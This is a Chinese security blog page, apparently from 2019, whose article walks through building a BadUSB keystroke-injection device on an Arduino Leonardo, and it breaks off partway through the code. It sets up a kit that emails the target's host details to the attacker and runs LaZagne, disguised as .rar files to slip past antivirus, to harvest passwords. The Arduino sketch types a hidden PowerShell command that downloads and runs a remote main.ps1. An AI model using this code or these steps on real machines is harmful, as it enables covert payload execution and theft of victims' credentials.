<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  <title>&#39;BadUSB制作&#39; | Sunian&#39;s Blog</title>
  <meta name="keywords" content=" 渗透测试 ">
  <meta name="description" content="&#39;BadUSB制作&#39; | Sunian&#39;s Blog">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="个人简历素念，男，19岁 现读于某大专院校，汽修专业，自学web安全 专注于研究渗透测试方向 web安全，内网，硬件，社工等 联系方式QQ：3504078815 邮箱：lingyu195@gmail.com">
<meta property="og:type" content="website">
<meta property="og:title" content="&#39;关于我&amp;whoami&#39;">
<meta property="og:url" content="http://yoursite.com/About/index.html">
<meta property="og:site_name" content="Sunian&#39;s Blog">
<meta property="og:description" content="个人简历素念，男，19岁 现读于某大专院校，汽修专业，自学web安全 专注于研究渗透测试方向 web安全，内网，硬件，社工等 联系方式QQ：3504078815 邮箱：lingyu195@gmail.com">
<meta property="og:locale" content="en">
<meta property="og:updated_time" content="2019-11-28T15:41:57.131Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="&#39;关于我&amp;whoami&#39;">
<meta name="twitter:description" content="个人简历素念，男，19岁 现读于某大专院校，汽修专业，自学web安全 专注于研究渗透测试方向 web安全，内网，硬件，社工等 联系方式QQ：3504078815 邮箱：lingyu195@gmail.com">


<link rel="icon" href="/imgss/touxiang.jpg">

<link href="/css/style.css?v=1.0.1" rel="stylesheet">

<link href="/css/hl_theme/darcula.css?v=1.0.1" rel="stylesheet">

<link href="//cdn.bootcss.com/animate.css/3.5.2/animate.min.css" rel="stylesheet">
<link href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="/js/jquery.autocomplete.min.js?v=1.0.1"></script>

<script src="//cdn.bootcss.com/highlight.js/9.12.0/highlight.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.bootcss.com/nprogress/0.2.0/nprogress.min.js"></script>



<script src="//cdn.bootcss.com/jquery-cookie/1.4.1/jquery.cookie.min.js"></script>

<script src="/js/iconfont.js?v=1.0.1"></script>

</head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="true">
  <input class="theme_blog_path" value>
</div>

<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/" class="avatar_target">
    <img class="avatar" src="/imgss/touxiang.jpg" />
</a>
<div class="author">
    <span>素念</span>
</div>

<div class="icon">
    
        
    
        
        <a title="github" href="https://github.com/sunian19/sunian19.github.io" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-github"></use>
                </svg>
            
        </a>
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
        <a title="email" href="mailto:lingyu195@gmail.com" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-email"></use>
                </svg>
            
        </a>
        
    
        
        <a title="qq" href="http://wpa.qq.com/msgrd?v=3&uin=3504078815&site=qq&menu=yes" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-qq"></use>
                </svg>
            
        </a>
        
    
        
    
        
    
</div>




<ul>
    <li><div class="all active">全部文章<small>(47)</small></div></li>
    
        
            
            <li><div data-rel="Linux基础">Linux基础<small>(5)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="遇到的问题">遇到的问题<small>(3)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="SQL注入">SQL注入<small>(11)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="漏洞复现">漏洞复现<small>(4)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="XSS">XSS<small>(7)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="基础知识">基础知识<small>(11)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="代码分析">代码分析<small>(1)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="文件包含">文件包含<small>(1)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="渗透测试">渗透测试<small>(4)</small></div>
                
            </li>
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
    
    
    
    
    </div>
    <div><a style="border-right: 1px solid #fff; width: 49%"  class="about site_url"  href="/about">关于</a><a style="width: 50%"  class="friends">友链</a></div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="47">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="back-title-list"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="https://meethanmj.github.io/">han</a></li>
            
            <li><a target="_blank" href="https://shh4757.github.io/">笨比shh</a></li>
            
            <li><a target="_blank" href="https://taylor8504.github.io/">taylor</a></li>
            
            <li><a target="_blank" href="https://0xxk.github.io/">0xxk</a></li>
            
            <li><a target="_blank" href="http://wp.fmk.pub/">Defender</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <form onkeydown="if(event.keyCode==13){return false;}">
        <input class="search" type="text" placeholder="Search..." autocomplete="off"id="local-search-input" >
        <i class="cross"></i>
        <span>
            <label for="tagswitch">Tags:</label>
            <input id="tagswitch" type="checkbox" style="display: none" />
            <i id="tagsWitchIcon"></i>
        </span>
    </form>
    <div class="tags-list">
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color3">Linux基础</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">环境搭建</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color1">遇到的问题</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color1">SQL注入</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">漏洞复现</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">XSS</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">基础知识</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">代码分析</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">渗透测试</a>
    </li>
    
    <div class="clearfix"></div>
</div>

    
    <nav id="title-list-nav">
        
        <a  class="Linux基础 "
           href="/2019/07/29/LAMP/"
           data-tag="Linux基础,环境搭建"
           data-author="" >
            <span class="post-title" title="&#39;LAMP环境搭建及DVWA和sqli&#39;">&#39;LAMP环境搭建及DVWA和sqli&#39;</span>
            <span class="post-date" title="2019-07-29 00:00:00">2019/07/29</span>
        </a>
        
        <a  class="遇到的问题 "
           href="/2019/11/27/CTF练习题/"
           data-tag="遇到的问题"
           data-author="" >
            <span class="post-title" title="&#39;CTF练习题解题&#39;">&#39;CTF练习题解题&#39;</span>
            <span class="post-date" title="2019-11-27 23:24:41">2019/11/27</span>
        </a>
        
        <a  class="SQL注入 "
           href="/2019/12/06/MsSQL及access注入/"
           data-tag="SQL注入"
           data-author="" >
            <span class="post-title" title="&#39;其他类型数据库注入&#39;">&#39;其他类型数据库注入&#39;</span>
            <span class="post-date" title="2019-12-06 21:29:00">2019/12/06</span>
        </a>
        
        <a  class="漏洞复现 "
           href="/2019/09/11/MS17-010/"
           data-tag="漏洞复现"
           data-author="" >
            <span class="post-title" title="&#39;MS17-010永恒之蓝漏洞复现&#39;">&#39;MS17-010永恒之蓝漏洞复现&#39;</span>
            <span class="post-date" title="2019-09-11 19:00:12">2019/09/11</span>
        </a>
        
        <a  class="XSS "
           href="/2019/12/11/XSS基础/"
           data-tag="XSS"
           data-author="" >
            <span class="post-title" title="&#39;XSS基础&#39;">&#39;XSS基础&#39;</span>
            <span class="post-date" title="2019-12-11 11:54:41">2019/12/11</span>
        </a>
        
        <a  class="XSS "
           href="/2019/12/25/XSS平台使用/"
           data-tag="XSS"
           data-author="" >
            <span class="post-title" title="&#39;XSS平台的使用&#39;">&#39;XSS平台的使用&#39;</span>
            <span class="post-date" title="2019-12-25 16:54:41">2019/12/25</span>
        </a>
        
        <a  class="XSS "
           href="/2019/12/10/XSS挑战之旅/"
           data-tag="XSS"
           data-author="" >
            <span class="post-title" title="&#39;XSS挑战之旅&#39;">&#39;XSS挑战之旅&#39;</span>
            <span class="post-date" title="2019-12-10 10:54:41">2019/12/10</span>
        </a>
        
        <a  class="基础知识 "
           href="/2019/08/05/PHP数组/"
           data-tag="基础知识"
           data-author="" >
            <span class="post-title" title="&#39;PHP循环和数组及函数&#39;">&#39;PHP循环和数组及函数&#39;</span>
            <span class="post-date" title="2019-08-05 00:00:00">2019/08/05</span>
        </a>
        
        <a  class="XSS "
           href="/2019/12/13/beef的使用/"
           data-tag="XSS"
           data-author="" >
            <span class="post-title" title="&#39;BeEF的使用&#39;">&#39;BeEF的使用&#39;</span>
            <span class="post-date" title="2019-12-13 11:54:41">2019/12/13</span>
        </a>
        
        <a  class="基础知识 "
           href="/2019/08/04/PHP基本语法/"
           data-tag="基础知识"
           data-author="" >
            <span class="post-title" title="&#39;PHP基本语法&#39;">&#39;PHP基本语法&#39;</span>
            <span class="post-date" title="2019-08-04 11:36:41">2019/08/04</span>
        </a>
        
        <a  class="漏洞复现 "
           href="/2019/09/11/bluekeep/"
           data-tag="漏洞复现"
           data-author="" >
            <span class="post-title" title="&#39;bluekeep漏洞复现&#39;">&#39;bluekeep漏洞复现&#39;</span>
            <span class="post-date" title="2019-09-11 19:00:12">2019/09/11</span>
        </a>
        
        <a  class="遇到的问题 "
           href="/2019/11/22/SSR问题/"
           data-tag="遇到的问题"
           data-author="" >
            <span class="post-title" title="使用代理遇到的问题">使用代理遇到的问题</span>
            <span class="post-date" title="2019-11-22 13:13:00">2019/11/22</span>
        </a>
        
        <a  class="遇到的问题 "
           href="/2019/11/27/kali4中文乱码问题/"
           data-tag="遇到的问题"
           data-author="" >
            <span class="post-title" title="&#39;新版kali中文乱码问题&#39;">&#39;新版kali中文乱码问题&#39;</span>
            <span class="post-date" title="2019-11-27 23:24:41">2019/11/27</span>
        </a>
        
        <a  class="基础知识 "
           href="/2019/07/28/html基本语法/"
           data-tag="基础知识"
           data-author="" >
            <span class="post-title" title="&#39;html基本语法&#39;">&#39;html基本语法&#39;</span>
            <span class="post-date" title="2019-07-28 00:00:00">2019/07/28</span>
        </a>
        
        <a  class="XSS "
           href="/2019/12/12/XSS进阶/"
           data-tag="XSS"
           data-author="" >
            <span class="post-title" title="&#39;XSS进阶&#39;">&#39;XSS进阶&#39;</span>
            <span class="post-date" title="2019-12-12 10:54:41">2019/12/12</span>
        </a>
        
        <a  class="SQL注入 "
           href="/2019/12/07/oracle数据库注入/"
           data-tag="SQL注入"
           data-author="" >
            <span class="post-title" title="&#39;oracle数据库注入&#39;">&#39;oracle数据库注入&#39;</span>
            <span class="post-date" title="2019-12-07 21:29:00">2019/12/07</span>
        </a>
        
        <a  class="SQL注入 "
           href="/2019/08/13/sql语句查询/"
           data-tag="SQL注入"
           data-author="" >
            <span class="post-title" title="&#39;sql查询语法&#39;">&#39;sql查询语法&#39;</span>
            <span class="post-date" title="2019-08-13 09:54:41">2019/08/13</span>
        </a>
        
        <a  class="漏洞复现 "
           href="/2019/10/28/thinkcmf/"
           data-tag="漏洞复现"
           data-author="" >
            <span class="post-title" title="&#39;thinkcmf框架漏洞复现&#39;">&#39;thinkcmf框架漏洞复现&#39;</span>
            <span class="post-date" title="2019-10-28 19:00:12">2019/10/28</span>
        </a>
        
        <a  class="SQL注入 "
           href="/2019/08/13/union/"
           data-tag="SQL注入"
           data-author="" >
            <span class="post-title" title="&#39;联合查询&#39;">&#39;联合查询&#39;</span>
            <span class="post-date" title="2019-08-13 22:54:41">2019/08/13</span>
        </a>
        
        <a  class="SQL注入 "
           href="/2019/12/06/其他常见类型注入/"
           data-tag="SQL注入"
           data-author="" >
            <span class="post-title" title="&#39;其他常见类型注入&#39;">&#39;其他常见类型注入&#39;</span>
            <span class="post-date" title="2019-12-06 19:01:00">2019/12/06</span>
        </a>
        
        <a  class="漏洞复现 "
           href="/2019/11/12/CVE2019-5418/"
           data-tag="漏洞复现"
           data-author="" >
            <span class="post-title" title="CVE2019-5418漏洞复现">CVE2019-5418漏洞复现</span>
            <span class="post-date" title="2019-11-12 12:00:12">2019/11/12</span>
        </a>
        
        <a  class="XSS "
           href="/2019/12/10/XSS靶场通关/"
           data-tag="XSS"
           data-author="" >
            <span class="post-title" title="&#39;XSS靶场通关&#39;">&#39;XSS靶场通关&#39;</span>
            <span class="post-date" title="2019-12-10 09:54:41">2019/12/10</span>
        </a>
        
        <a  class="代码分析 "
           href="/2019/09/13/webshell分析/"
           data-tag="代码分析"
           data-author="" >
            <span class="post-title" title="&#39;webshell代码分析&#39;">&#39;webshell代码分析&#39;</span>
            <span class="post-date" title="2019-09-13 12:00:12">2019/09/13</span>
        </a>
        
        <a  class="Linux基础 "
           href="/2019/08/07/常用命令整理/"
           data-tag="Linux基础"
           data-author="" >
            <span class="post-title" title="&#39;常用命令整理&#39;">&#39;常用命令整理&#39;</span>
            <span class="post-date" title="2019-08-07 00:00:00">2019/08/07</span>
        </a>
        
        <a  class="XSS "
           href="/2019/12/12/学习XSS前准备/"
           data-tag="XSS"
           data-author="" >
            <span class="post-title" title="&#39;学习XSS及CSRF前准备&#39;">&#39;学习XSS及CSRF前准备&#39;</span>
            <span class="post-date" title="2019-12-12 11:54:41">2019/12/12</span>
        </a>
        
        <a  class="基础知识 "
           href="/2019/08/21/burp使用/"
           data-tag="基础知识"
           data-author="" >
            <span class="post-title" title="&#39;burp使用&#39;">&#39;burp使用&#39;</span>
            <span class="post-date" title="2019-08-21 21:50:12">2019/08/21</span>
        </a>
        
        <a  class="基础知识 "
           href="/2019/08/17/文件函数/"
           data-tag="基础知识"
           data-author="" >
            <span class="post-title" title="&#39;文件函数部分&#39;">&#39;文件函数部分&#39;</span>
            <span class="post-date" title="2019-08-17 20:39:12">2019/08/17</span>
        </a>
        
        <a  class="文件包含 "
           href="/2019/07/28/文件包含4.8/"
           data-tag="漏洞复现"
           data-author="" >
            <span class="post-title" title="&#39;phpMyAdmin4.8漏洞复现&#39;">&#39;phpMyAdmin4.8漏洞复现&#39;</span>
            <span class="post-date" title="2019-07-28 09:54:41">2019/07/28</span>
        </a>
        
        <a  class="SQL注入 "
           href="/2019/12/05/注入基础/"
           data-tag="SQL注入"
           data-author="" >
            <span class="post-title" title="&#39;注入基础&#39;">&#39;注入基础&#39;</span>
            <span class="post-date" title="2019-12-05 11:45:41">2019/12/05</span>
        </a>
        
        <a  class="SQL注入 "
           href="/2019/07/31/对某厂商的盲注/"
           data-tag="SQL注入"
           data-author="" >
            <span class="post-title" title="&#39;对某厂商的盲注&#39;">&#39;对某厂商的盲注&#39;</span>
            <span class="post-date" title="2019-07-31 09:54:41">2019/07/31</span>
        </a>
        
        <a  class="SQL注入 "
           href="/2019/12/06/注入流程及方式/"
           data-tag="SQL注入"
           data-author="" >
            <span class="post-title" title="&#39;MySQL注入流程及方式&#39;">&#39;MySQL注入流程及方式&#39;</span>
            <span class="post-date" title="2019-12-06 15:45:41">2019/12/06</span>
        </a>
        
        <a  class="基础知识 "
           href="/2019/07/31/渗透测试流程/"
           data-tag="基础知识"
           data-author="" >
            <span class="post-title" title="&#39;专业术语及渗透测试流程&#39;">&#39;专业术语及渗透测试流程&#39;</span>
            <span class="post-date" title="2019-07-31 09:54:41">2019/07/31</span>
        </a>
        
        <a  class="渗透测试 "
           href="/2019/11/27/渗透测试之谷歌插件/"
           data-tag="渗透测试"
           data-author="" >
            <span class="post-title" title="&#39;渗透测试之谷歌插件&#39;">&#39;渗透测试之谷歌插件&#39;</span>
            <span class="post-date" title="2019-11-27 23:24:41">2019/11/27</span>
        </a>
        
        <a  class="Linux基础 "
           href="/2019/07/28/用户权限和组/"
           data-tag="Linux基础"
           data-author="" >
            <span class="post-title" title="&#39;权限问题&#39;">&#39;权限问题&#39;</span>
            <span class="post-date" title="2019-07-28 09:54:41">2019/07/28</span>
        </a>
        
        <a  class="基础知识 "
           href="/2019/08/21/绕过token/"
           data-tag="基础知识"
           data-author="" >
            <span class="post-title" title="&#39;绕过DVWA的token&#39;">&#39;绕过DVWA的token&#39;</span>
            <span class="post-date" title="2019-08-21 21:50:12">2019/08/21</span>
        </a>
        
        <a  class="渗透测试 "
           href="/2019/12/14/记一次靶场渗透/"
           data-tag="渗透测试"
           data-author="" >
            <span class="post-title" title="&#39;记一次靶场渗透练习&#39;">&#39;记一次靶场渗透练习&#39;</span>
            <span class="post-date" title="2019-12-14 21:54:41">2019/12/14</span>
        </a>
        
        <a  class="基础知识 "
           href="/2019/08/12/小程序/"
           data-tag="基础知识"
           data-author="" >
            <span class="post-title" title="&#39;PHP小程序&#39;">&#39;PHP小程序&#39;</span>
            <span class="post-date" title="2019-08-12 00:00:00">2019/08/12</span>
        </a>
        
        <a  class="SQL注入 "
           href="/2019/08/28/注入新闻页面/"
           data-tag="SQL注入"
           data-author="" >
            <span class="post-title" title="&#39;注入新闻页面&#39;">&#39;注入新闻页面&#39;</span>
            <span class="post-date" title="2019-08-28 08:45:41">2019/08/28</span>
        </a>
        
        <a  class="Linux基础 "
           href="/2019/08/04/防火墙/"
           data-tag="Linux基础"
           data-author="" >
            <span class="post-title" title="&#39;防火墙&#39;">&#39;防火墙&#39;</span>
            <span class="post-date" title="2019-08-04 00:00:00">2019/08/04</span>
        </a>
        
        <a  class="SQL注入 "
           href="/2019/12/06/注入之dns/"
           data-tag="SQL注入"
           data-author="" >
            <span class="post-title" title="&#39;DNSlog数据外带及过waf&#39;">&#39;DNSlog数据外带及过waf&#39;</span>
            <span class="post-date" title="2019-12-06 21:29:00">2019/12/06</span>
        </a>
        
        <a  class="渗透测试 "
           href="/2019/11/29/badusb制作/"
           data-tag="渗透测试"
           data-author="" >
            <span class="post-title" title="&#39;BadUSB制作&#39;">&#39;BadUSB制作&#39;</span>
            <span class="post-date" title="2019-11-29 09:25:04">2019/11/29</span>
        </a>
        
        <a  class="SQL注入 "
           href="/2019/12/07/SQLmap的使用/"
           data-tag="SQL注入"
           data-author="" >
            <span class="post-title" title="&#39;SQLmap的使用&#39;">&#39;SQLmap的使用&#39;</span>
            <span class="post-date" title="2019-12-07 20:33:12">2019/12/07</span>
        </a>
        
        <a  class="Linux基础 "
           href="/2019/07/29/linux基础总结/"
           data-tag="Linux基础"
           data-author="" >
            <span class="post-title" title="&#39;LINUX基本命令总结&#39;">&#39;LINUX基本命令总结&#39;</span>
            <span class="post-date" title="2019-07-29 00:00:00">2019/07/29</span>
        </a>
        
        <a  class="基础知识 "
           href="/2019/08/17/数据库分类/"
           data-tag="基础知识"
           data-author="" >
            <span class="post-title" title="&#39;数据库部分&#39;">&#39;数据库部分&#39;</span>
            <span class="post-date" title="2019-08-17 20:33:12">2019/08/17</span>
        </a>
        
        <a  class="基础知识 "
           href="/2019/08/21/http基础/"
           data-tag="基础知识"
           data-author="" >
            <span class="post-title" title="&#39;httpd知识&#39;">&#39;httpd知识&#39;</span>
            <span class="post-date" title="2019-08-21 20:13:12">2019/08/21</span>
        </a>
        
        <a  class="渗透测试 "
           href="/2019/11/27/渗透测试前期信息搜集/"
           data-tag="渗透测试"
           data-author="" >
            <span class="post-title" title="&#39;渗透测试之前期信息搜集&#39;">&#39;渗透测试之前期信息搜集&#39;</span>
            <span class="post-date" title="2019-11-27 23:04:41">2019/11/27</span>
        </a>
        
        <a  class="基础知识 "
           href="/2019/08/13/新闻登陆界面/"
           data-tag="基础知识"
           data-author="" >
            <span class="post-title" title="&#39;新闻页面&#39;">&#39;新闻页面&#39;</span>
            <span class="post-date" title="2019-08-13 09:54:41">2019/08/13</span>
        </a>
        
    </nav>
</div>
    </div>
    <div class="hide-list">
        <div class="semicircle">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div class="post">
    <div class="pjax">
        <article id="post-badusb制作" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">&#39;BadUSB制作&#39;</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            
                <a href="javascript:" data-rel="渗透测试">渗透测试</a>
            
        </span>
        
        
        <span class="tag">
            
            <a href="javascript:" class="color5">渗透测试</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
        创建时间:<time class="date" title='更新时间: 2019-11-29 09:40:25'>2019-11-29 09:25</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            阅读:<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#HID攻击原理"><span class="toc-text">HID攻击原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#硬件准备"><span class="toc-text">硬件准备</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#函数介绍"><span class="toc-text">函数介绍</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#软件驱动准备"><span class="toc-text">软件驱动准备</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#测试脚本"><span class="toc-text">测试脚本</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#替换其他脚本"><span class="toc-text">替换其他脚本</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Arduino代码"><span class="toc-text">Arduino代码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#总结"><span class="toc-text">总结</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#扩展代码"><span class="toc-text">扩展代码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#其他过狗代码，自行研究"><span class="toc-text">其他过狗代码，自行研究</span></a></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    <div class="article-entry" itemprop="articleBody">
      
        <h3 id="HID攻击原理"><a href="#HID攻击原理" class="headerlink" title="HID攻击原理"></a>HID攻击原理</h3><p>HID是Human Interface Device的缩写，由其名称可以了解HID设备是直接与人交互的设备。一般来讲针对HID的攻击主要集中在键盘鼠标上，因为只要控制了用户键盘，基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中，当用户将含有攻击向量的鼠标或键盘，插入电脑时，恶意代码会被加载并执行。简而言之，今天要介绍的Badusb利用的是虚拟键盘来实现恶意代码的执行。</p>
<h3 id="硬件准备"><a href="#硬件准备" class="headerlink" title="硬件准备"></a>硬件准备</h3><p>(购买板子或购买有外壳的）<br><a href="https://item.taobao.com/item.htm?spm=a1z09.2.0.0.3d1f2e8dNaX0hO&amp;id=589099911512&amp;_u=m2i3k6cqf473" target="_blank" rel="noopener">https://item.taobao.com/item.htm?spm=a1z09.2.0.0.3d1f2e8dNaX0hO&amp;id=589099911512&amp;_u=m2i3k6cqf473</a><br><a href="https://m.tb.cn/h.eFDEFMN?sm=e737b6" target="_blank" rel="noopener">https://m.tb.cn/h.eFDEFMN?sm=e737b6</a></p>
<h3 id="函数介绍"><a href="#函数介绍" class="headerlink" title="函数介绍"></a>函数介绍</h3><p>Arduino IDE中使用的开发语言是C，一个程序在Arduino IDE中被成为 sketch，每个 sketch 都包含一个 setup 函数和一个 loop 函数。程序启动，首先调用 setup，这个函<br>数只被调用一次，loop 函数会被不停的重复调用下去。</p>
<h3 id="软件驱动准备"><a href="#软件驱动准备" class="headerlink" title="软件驱动准备"></a>软件驱动准备</h3><p>编译器Arduino IDE，Teensyduino驱动，arduino驱动<br>（百度云盘直接下载ZIP，解压即可使用）<br>链接：<a href="https://pan.baidu.com/s/16lDkrlxU9BpCD7kKgGhJng" target="_blank" rel="noopener">https://pan.baidu.com/s/16lDkrlxU9BpCD7kKgGhJng</a><br>提取码：onqg<br>驱动准备<br><img src="/imgss/tu53.png" alt><br>Teensyduino安装，特别注意编译器版本需要在1.6.4以下<br><img src="/imgss/tu54.png" alt><br><img src="/imgss/tu55.png" alt><br><img src="/imgss/tu56.png" alt><br>选择all安装<br><img src="/imgss/tu57.png" alt><br>中途可能会出错，我重启下电脑就好了（没搞懂，报错说是不为管理员启动安装或杀毒软件运行）<br>可能这就是玄学重启吧<br><img src="/imgss/tu58.png" alt></p>
<h3 id="测试脚本"><a href="#测试脚本" class="headerlink" title="测试脚本"></a>测试脚本</h3><p>打开编译器，测试脚本（循环模式2秒写一个hello world）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">void <span class="function"><span class="title">setup</span></span>() &#123;</span><br><span class="line">  // put your setup code here, to run once:</span><br><span class="line">  Keyboard.print(<span class="string">"Hello World"</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">void <span class="function"><span class="title">loop</span></span>() &#123;</span><br><span class="line">  // put your main code here, to run repeatedly:</span><br><span class="line">  delay(2000);  // 暂停2秒</span><br><span class="line">  Keyboard.print(<span class="string">"Hello World"</span>);  // 模拟键盘输入</span><br></pre></td></tr></table></figure>

<p><img src="/imgss/tu59.png" alt><br>先验证再上传<br>录入成功<br><img src="/imgss/tu60.png" alt></p>
<h3 id="替换其他脚本"><a href="#替换其他脚本" class="headerlink" title="替换其他脚本"></a>替换其他脚本</h3><p>为确保我们的脚本能够完美地发送包含目标主机信息的邮件，我们需要开启smtp邮箱服务。本处我使用的是QQ邮箱，开启方法如下：<br>进入邮箱，点击设置-账户<br><img src="/imgss/tu61.png" alt><br>往下拉，开启前两个服务<br><img src="/imgss/tu62.png" alt><br>此过程需要验证密保~<br>即可获得“授权码”（即后文提到的邮箱密码）此处的邮箱密码并不是指QQ密码<br><img src="/imgss/tu63.png" alt><br>首先下载Badusb所需代码，代码已打包（见云盘链接）<br>修改2754行的IP地址为自己服务器IP<br><img src="/imgss/tu64.png" alt><br>修改main.ps1的2903-2919行 为发送邮件配置<br><img src="/imgss/tu65.png" alt><br>修改GetPass.ps1中的前两行，域名，Getpass.rar实际上是lazagne，用rar下载尽量避免触发安全软件，这个不放心可以百度下载。command.rar实为bat 因为 lazagne注入lsass时会被安全软件拦截，所以用bat避免注入。修改GetPass.ps1中的邮箱配置，同main.ps1中的就行<br><img src="/imgss/tu66.png" alt><br>将修改后的文件（共四个）上传到公网服务器，如利用Xshell，FinalShell等工具直接拖拽上传</p>
<h3 id="Arduino代码"><a href="#Arduino代码" class="headerlink" title="Arduino代码"></a>Arduino代码</h3><p>1.打开Arduino IDE<br>2.工具-&gt;版-&gt;选择“Arduino Leonardo“<br>3，port选择COM3<br><img src="/imgss/tu67.png" alt></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">void <span class="function"><span class="title">setup</span></span>()&#123;//初始化 </span><br><span class="line">Keyboard.begin();//开始键盘通讯 </span><br><span class="line">delay(5000);//延时 </span><br><span class="line">Keyboard.press(KEY_LEFT_GUI);//win键 </span><br><span class="line">delay(500);</span><br><span class="line">Keyboard.press(<span class="string">'r'</span>);//r键</span><br><span class="line">delay(500); </span><br><span class="line">Keyboard.release(KEY_LEFT_GUI);</span><br><span class="line">Keyboard.release(<span class="string">'r'</span>); </span><br><span class="line">Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法</span><br><span class="line">Keyboard.release(KEY_CAPS_LOCK);</span><br><span class="line">delay(500);</span><br><span class="line">Keyboard.println(<span class="string">"CMD"</span>);</span><br><span class="line">delay(500);</span><br><span class="line">Keyboard.press(KEY_RETURN); </span><br><span class="line">Keyboard.release(KEY_RETURN); </span><br><span class="line">delay(3000);</span><br><span class="line">Keyboard.println(<span class="string">"powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString('http://8.8.8.8/main.ps1') "</span>);</span><br><span class="line">Keyboard.press(KEY_RETURN); </span><br><span class="line">Keyboard.release(KEY_RETURN);</span><br><span class="line">Keyboard.press(KEY_CAPS_LOCK); </span><br><span class="line">Keyboard.release(KEY_CAPS_LOCK);</span><br><span class="line">Keyboard.end();//结束键盘通讯 </span><br><span class="line">Keyboard.begin();//开始键盘通讯 </span><br><span class="line">delay(5000);//延时 </span><br><span 